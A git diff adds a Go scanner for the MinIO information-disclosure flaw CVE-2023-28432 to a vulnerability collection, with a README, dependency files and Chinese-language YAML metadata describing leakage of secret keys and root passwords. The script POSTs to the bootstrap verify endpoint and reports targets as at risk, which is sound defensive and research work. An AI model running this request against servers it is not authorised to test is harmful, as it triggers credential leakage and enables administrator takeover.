diff --git a/cve/MinIO/CVE-2023-28432/README.md b/cve/MinIO/CVE-2023-28432/README.md new file mode 100644 index 0000000000000000000000000000000000000000..2b8196890717f56a6a1ecdcbf3c4bb767e241123 --- /dev/null +++ b/cve/MinIO/CVE-2023-28432/README.md @@ -0,0 +1,11 @@ +CVE-2023-28432 +CVE-2023-28432 MinIO敏感信息泄露检测脚本 + +Usage +```bash +go mod tidy + +go build main.go + +./main -u 'http://example.com' +``` \ No newline at end of file diff --git a/cve/MinIO/CVE-2023-28432/go.mod b/cve/MinIO/CVE-2023-28432/go.mod new file mode 100644 index 0000000000000000000000000000000000000000..53876d1a8d388387129d1ce66938aef79ebba3a6 --- /dev/null +++ b/cve/MinIO/CVE-2023-28432/go.mod @@ -0,0 +1,18 @@ +module github.com/Cuerz/CVE-2023-28432 + +go 1.20 + +require ( + github.com/parnurzeal/gorequest v0.2.16 + github.com/urfave/cli v1.22.12 +) + +require ( + github.com/cpuguy83/go-md2man/v2 v2.0.2 // indirect + github.com/elazarl/goproxy v0.0.0-20221015165544-a0805db90819 // indirect + github.com/pkg/errors v0.9.1 // indirect + github.com/russross/blackfriday/v2 v2.1.0 // indirect + github.com/smartystreets/goconvey v1.7.2 // indirect + golang.org/x/net v0.8.0 // indirect + moul.io/http2curl v1.0.0 // indirect +) diff --git a/cve/MinIO/CVE-2023-28432/go.sum b/cve/MinIO/CVE-2023-28432/go.sum new file mode 100644 index 0000000000000000000000000000000000000000..03af7b16474858b38a22c3b5a2b13d6887c0c9cc --- /dev/null +++ b/cve/MinIO/CVE-2023-28432/go.sum @@ -0,0 +1,49 @@ +github.com/BurntSushi/toml v1.2.1/go.mod h1:CxXYINrC8qIiEnFrOxCa7Jy5BFHlXnUU2pbicEuybxQ= +github.com/cpuguy83/go-md2man/v2 v2.0.2 h1:p1EgwI/C7NhT0JmVkwCD2ZBK8j4aeHQX2pMHHBfMQ6w= +github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/elazarl/goproxy v0.0.0-20221015165544-a0805db90819 h1:RIB4cRk+lBqKK3Oy0r2gRX4ui7tuhiZq2SuTtTCi0/0= +github.com/elazarl/goproxy v0.0.0-20221015165544-a0805db90819/go.mod h1:Ro8st/ElPeALwNFlcTpWmkr6IoMFfkjXAvTHpevnDsM= +github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2/go.mod h1:gNh8nYJoAm43RfaxurUnxr+N1PwuFV3ZMl/efxlIlY8= +github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1 h1:EGx4pi6eqNxGaHF6qqu48+N2wcFQ5qg5FXgOdqsJ5d8= +github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY= +github.com/jtolds/gls v4.20.0+incompatible h1:xdiiI2gbIgH/gLH7ADydsJ1uDOEzR8yvV7C0MuV77Wo= +github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= +github.com/parnurzeal/gorequest v0.2.16 h1:T/5x+/4BT+nj+3eSknXmCTnEVGSzFzPGdpqmUVVZXHQ= +github.com/parnurzeal/gorequest v0.2.16/go.mod h1:3Kh2QUMJoqw3icWAecsyzkpY7UzRfDhbRdTjtNwNiUE= +github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= +github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/rogpeppe/go-charset v0.0.0-20180617210344-2471d30d28b4/go.mod h1:qgYeAmZ5ZIpBWTGllZSQnw97Dj+woV0toclVaRGI8pc= +github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf35Ld67mk= +github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= +github.com/smartystreets/assertions v1.2.0 h1:42S6lae5dvLc7BrLu/0ugRtcFVjoJNMC/N3yZFZkDFs= +github.com/smartystreets/assertions v1.2.0/go.mod h1:tcbTF8ujkAEcZ8TElKY+i30BzYlVhC/LOxJk7iOWnoo= +github.com/smartystreets/goconvey v1.7.2 h1:9RBaZCeXEQ3UselpuwUQHltGVXvdwm6cv1hgR6gDIPg= +github.com/smartystreets/goconvey v1.7.2/go.mod h1:Vw0tHAZW6lzCRk3xgdin6fKYcG+G3Pg9vgXWeJpQFMM= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= +github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= +github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1 h1:w7B6lhMri9wdJUVmEZPGGhZzrYTPvgJArz7wNPgYKsk= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= +github.com/urfave/cli v1.22.12 h1:igJgVw1JdKH+trcLWLeLwZjU9fEfPesQ+9/e4MQ44S8= +github.com/urfave/cli v1.22.12/go.mod h1:sSBEIC79qR6OvcmsD4U3KABeOTxDqQtdDnaFuUN30b8= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.8.0 h1:Zrh2ngAOFYneWTAIAPethzeaQLuHwhuBkuV6ZiRnUaQ= +golang.org/x/net v0.8.0/go.mod h1:QVkue5JL9kW//ek3r6jTKnTFis1tRmNAW2P1shuFdJc= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +moul.io/http2curl v1.0.0 h1:6XwpyZOYsgZJrU8exnG87ncVkU1FVCcTRpwzOkTDUi8= +moul.io/http2curl v1.0.0/go.mod h1:f6cULg+e4Md/oW1cYmwW4IWQOVl2lGbmCNGOHvzX2kE= diff --git a/cve/MinIO/CVE-2023-28432/main.go b/cve/MinIO/CVE-2023-28432/main.go new file mode 100644 index 0000000000000000000000000000000000000000..69bddc190c839a7070dbc42d6f821943d6fc475a --- /dev/null +++ b/cve/MinIO/CVE-2023-28432/main.go @@ -0,0 +1,57 @@ +package main + +import ( + "fmt" + "github.com/parnurzeal/gorequest" + "github.com/urfave/cli" + "os" + "time" +) + +func check(c *cli.Context) error { + defer func() { + err := recover() + if err != nil { + fmt.Println(time.Now().Format("2006-01-02 15:04:05"), "【http error】", "返回信息:", err) + } + }() + if c.NumFlags() == 0 { + cli.ShowAppHelpAndExit(c, 0) + } + host := c.String("url") + url := host + "/minio/bootstrap/v1/verify" + request := gorequest.New() + resp, _, errs := request.Post(url). + Set("Content-Type", "application/x-www-form-urlencoded"). + End() + if errs != nil { + panic(errs) + } + + if resp.Status == "200 OK" { + fmt.Println(time.Now().Format("2006-01-02 15:04:05"), "【存在风险】:", url) + } else { + fmt.Println(time.Now().Format("2006-01-02 15:04:05"), "【不存在风险】:", url) + } + return nil +} +func main() { + app := &cli.App{ + Name: "CVE-2023-28432", + Description: "CVE-2023-28432 check", + Action: check, + Flags: []cli.Flag{ + &cli.StringFlag{ + Name: "url, u", + Usage: "target, eg: \"http://www.example.com\"", + Required: true, + Value: "", + }, + }, + } + err := app.Run(os.Args) + if err != nil { + fmt.Println("err:", err) + } + +} diff --git a/cve/MinIO/yaml/CVE-2023-28432.yaml b/cve/MinIO/yaml/CVE-2023-28432.yaml new file mode 100644 index 0000000000000000000000000000000000000000..5f5b10c92f66909b949b1478c6a582265242bf9b --- /dev/null +++ b/cve/MinIO/yaml/CVE-2023-28432.yaml @@ -0,0 +1,22 @@ +id: CVE-2023-28432 +source: https://github.com/Cuerz/CVE-2023-28432 +info: + name: MinIO是根据 GNU Affero 通用公共许可证 v3.0 发布的高性能对象存储。它与Amazon S3云存储服务API 兼容。它可以处理非结构化数据,例如照片、视频、日志文件、备份和容器镜像。 + severity: High + description: | + 未经身份验证的攻击者向在集群部署中的MinIO发送特殊的HTTP请求即可获取到包括MINIO_SECRET_KEY以及MINIO_ROOT_PASSWORD在内的所有环境变量信息,从而造成信息泄露并且能够以管理员身份登录MinIO。 + scope-of-influence: RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z + reference: + - https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z + - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q + - https://twitter.com/Andrew___Morris/status/1639325397241278464 + - https://viz.greynoise.io/tag/minio-information-disclosure-attempt + - https://www.greynoise.io/blog/openai-minio-and-why-you-should-always-use-docker-cli-scan-to-keep-your-supply-chain-clean + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-28432 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: 信息暴露 diff --git a/other_list.yaml b/other_list.yaml index a7f45feb6182dd84e528129821a458a7842aa4a2..750ca9c5aecf0bc70f4f2c78e37242d85882bf82 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -37,4 +37,6 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 + MinIO: + - CVE-2023-28432 cnvd: